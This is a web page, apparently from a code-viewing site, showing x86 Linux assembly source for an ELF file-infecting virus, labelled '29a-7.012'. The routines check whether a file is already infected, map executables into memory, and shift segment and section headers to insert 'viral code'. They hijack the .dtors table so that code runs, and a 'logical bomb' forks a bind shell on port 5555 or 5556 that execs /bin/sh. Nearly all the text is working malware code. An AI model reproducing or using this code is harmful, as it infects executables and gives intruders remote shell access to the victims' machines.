📄 29a-7.012
字号:
add esp, 0x40
xor edx, edx
mov eax, [ecx+0x14]
mov ecx, 0x1000
div ecx
test edx, edx ; is file align on 0x1000 ?
jne notinfected ; if no file is not infected, infection FALSE
xor eax, eax ; else infection TRUE
notinfected:
ret
;----------------------------------------------------------------------------
;
;in : pointer of file name in esp
;out : pointer of next file name in esp
nextfile:
pop ebx ; save ret adress
xor eax, eax
mov al, [esp] ; eax = offsset next name
add esp, eax ;
mov al, [esp] ;
push ebx ;
ret
;---------------------------------------------------------------------------
;
;in : fd in ebx
;out : result of read in eax
read:
xor eax, eax
mov al, sys_read
sub esp, 4 ;
mov ecx, esp
mov edx, 4
int 0x80 ;
pop eax ; dword read in eax
ret
;-------------------------------------------------------------------------------
;
;in : fd file in ebx
;out : pointer of map file in eax
Mapping:
xor edx, edx
push edx
push ebx
inc edx
push edx
inc edx
inc edx
push edx
push ecx
xor eax, eax
push eax
mov al, sys_mmap
xchg ebx, edx
mov ebx, esp
int 0x80
xchg ebx, edx
add esp, 0x18
ret
;-------------------------------------------------------------------------------
;
;in : ecx size of mapping
;out : eax == 0 if succes
Demap:
xor eax, eax
mov al, sys_munmap
xor ebx, ebx
int 0x80
ret
;-------------------------------------------------------------------------------
;
;in :
;out :
PatchSegment:
xor ecx, ecx
mov cl, BYTE [eax+0x2c]; ecx = number of segments
mov edx, [eax+0x1c] ; edx pointer to phdr
add edx, eax
rygo:
push ecx ;
mov ecx, 0x06
cmp [edx], ecx ;
jne hi
mov ecx, 0x1000
sub [edx+0x08], ecx
sub [edx+0x0c], ecx ; patch phdr.
jmp ha
hi: xor ecx, ecx
cmp [edx+0x04], ecx ; test if TEXT segment.
jne ho
mov ecx, 0x1000
sub [edx+0x08], ecx
sub [edx+0x0c], ecx
add [edx+0x10], ecx
add [edx+0x14], ecx ; patch phdr.
mov ebp, [edx+08h] ; ebp pointer to viral code
jmp ha
ho: mov ecx, 0x1000
add [edx+04], ecx ; add a memory segment
ha:
pop ecx
dec ecx
test ecx, ecx ; other segments ?
je good ;
add dl, BYTE [eax+0x2a]; if yes we go patch the other
jmp rygo
good:
ret
;----------------------------------------------------------------------------
;
;in :
;out :
PatchSection:
mov edx, [eax+0x20]
add edx, eax
add edx, 0x1000 ; e_shoff
xor ecx, ecx
mov cx, [eax+0x30] ; nbre de section.
dec ecx
xor esi, esi
mov si, [eax+0x2E] ; e_shentsize
patch:
add edx, esi
mov ebx, [edx+0x10] ; sh_offset
add ebx, 0x1000
mov [edx+0x10], ebx
loop patch
ret
;-----------------------------------------------------------------------------
;in : pointer to adress of file mmaping in ebx
;out : eax == 0 if functions fail
hijackDtors:
;find the sh_offset of .shstrtab(e_shentsize*e_shstrndx+e_shoff+adresse map)
xor eax, eax
mov ax, [ebx+0x2E] ; e_shentsize
mov cl, [ebx+0x32] ; e_shstrndx on 8bits!!!(nb_section<255)
mul cl ;
;
add eax, [ebx+0x20] ; + e_shoff == offset shdr .shstrtab
add eax, ebx ; + adress of file maping
mov esi, eax
add esi, 0x10 ; sh_offset of .shstrtab
;looking for .dtors in sh_name of each sections
xor eax, eax
mov eax, [ebx+0x20] ; offset shdr
add eax, ebx ;
xor ecx, ecx
mov cx, [ebx+0x30] ; e_shnum
mov edi, [esi] ; edi == offset .shstrtab
add edi, ebx ;
xor edx, edx
next_shname:
xor edx, edx
mov dx, WORD [ebx+0x2E]
add eax, edx ; next shdr (we don't read the first)
mov esi, [eax]
add esi, edi
mov edx, [esi]
cmp edx, '.dto'
je dtor_finding
loop next_shname
xor eax, eax ; if don't find it
ret ;
;find the last entry in .dtors tab, and write a new entry :)
dtor_finding:
mov ecx, [eax+0x10] ; sh_offset of .dtors
add ecx, ebx ; + map
next_dtor:
add ecx, 4 ; don't check the first entry (must
mov edx, [ecx] ; be 0xFFFFFFFF)
cmp edx, 0
jne next_dtor
mov DWORD [ecx], ebp ; offset of viral code
ret
;----------------------------------------------------------------------------
;bind a shell on port 5556 if uid = 0 else bind a shell on port 5555
bomb:
xor eax, eax
mov al, sys_fork ;fork the logical bomb
int 0x80
test eax, eax
je bindshell ; the son bind the shell
ret ; the father exit
bindshell:
;socket(family, type, proto)
xor eax, eax
cdq
mov al, sys_socket
push edx ; 0=IP
inc edx
push edx ; 1=SOCK_STREAM
inc edx
push edx ; 2=AF_INET
mov ecx, esp
push byte 1
pop ebx ; 1 -> socket
int 0x80
;bind(socket, addr, lenng)
mov edi, eax
cdq
xor ecx, ecx
mov cx, 0xB315
xor eax, eax
mov al, sys_getuid
int 0x80
test eax, eax ;if uid != 0
jne binduser ;goto binduser
inc ch ;
binduser:
push edx
push word cx ; port = 5556 if uid(0) else port = 5555
inc ebx
push bx ; (0002 = AF_INET)
mov ecx, esp ; ecx = offset sockaddr struct
push byte 16 ; len
push ecx ; push offset sockaddr struct
push edi ; handle socket
mov ecx, esp
xor eax, eax
mov al, sys_socket
int 0x80
;If bind fail the process send to himself a SIGKILL
test eax, eax
je listen
xor eax, eax
mov al, sys_getpid
int 0x80
xchg ebx, eax
xor ecx, ecx
mov cl, SIGKILL
xor eax, eax
mov al, sys_kill
int 0x80
;listen(socket, backlog)
listen:
mov al, sys_socket
mov bl, LISTEN
int 0x80
;accept(socket, addr, len)
push eax
push edi
mov ecx, esp
inc ebx ; 5 -> accept
mov al, sys_socket
int 0x80
;dup2()
dup:
mov ecx, ebx
mov ebx, eax
dec ecx
mov al, sys_dup2
int 0x80
inc ecx
loop dup
;execve /bin/sh
mov al, sys_exec
push ecx
push 0x68732f6e
push 0x69622f2f
mov ebx, esp
push ecx
push ebx
mov ecx, esp
int 0x80
fin_code:
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -